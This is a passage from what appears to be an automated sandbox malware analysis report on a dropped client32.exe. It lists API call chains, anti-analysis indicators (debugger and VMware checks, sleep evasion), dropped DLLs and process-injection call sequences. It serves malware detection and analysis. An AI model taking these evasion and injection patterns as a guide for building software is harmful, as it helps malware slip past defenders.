                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,6_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,6_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,6_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11024880
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,InternetQueryDataAvailable,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EEF91F04_2_6EEF91F0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF04F304_2_6EF04F30
                                Delayed program exit found
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110B86C0 Sleep,ExitProcess,4_2_110B86C0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110B86C0 Sleep,ExitProcess,6_2_110B86C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4359Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5502Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeWindow / User API: threadDelayed 526Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeWindow / User API: threadDelayed 417Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeWindow / User API: threadDelayed 7768Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-83084
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-88417
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-88019
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-88622
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-88754
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-88788
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-88158
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-82763
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI coverage: 6.8 %
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI coverage: 2.8 %
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF04F304_2_6EF04F30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3060Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe TID: 3732Thread sleep time: -131500s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe TID: 4112Thread sleep time: -41700s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe TID: 3732Thread sleep time: -1942000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF03130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6EF03226h4_2_6EF03130
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106ABD0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: client32.exeBinary or memory string: VMware
                                Source: client32.exeBinary or memory string: VMWare
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-82632
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-83232
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-88897
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,4_2_110B7F30
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,InternetQueryDataAvailable,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,4_2_1117D104
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,4_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,4_2_11031780
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1116EC49
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF128E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6EF128E1
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,6_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,6_2_11031780
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1116EC49
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,4_2_110F4990
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11113190 GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
